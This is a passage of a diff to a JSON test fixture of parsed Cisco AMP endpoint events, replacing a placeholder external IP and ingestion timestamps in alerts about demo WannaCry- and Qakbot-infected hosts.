9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3718,7 +3718,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -3779,7 +3779,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3796,8 +3796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025309292Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:39.764098800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3819,7 +3819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -3869,7 +3869,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3886,8 +3886,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025311506Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764104Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3909,7 +3909,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3955,7 +3955,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3972,8 +3972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025313723Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764110200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3995,7 +3995,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4054,7 +4054,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4071,8 +4071,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025315961Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764116300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -4094,7 +4094,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4157,7 +4157,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4174,8 +4174,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025318355Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764122900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -4197,7 +4197,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -4234,7 +4234,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4244,8 +4244,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:14:44.025320596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:39.764129Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -4262,7 +4262,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4290,7 +4290,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4300,8 +4300,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:14:44.025322840Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:39.764151Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -4318,7 +4318,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -4354,7 +4354,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4364,8 +4364,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025325035Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764178800Z", + "original": 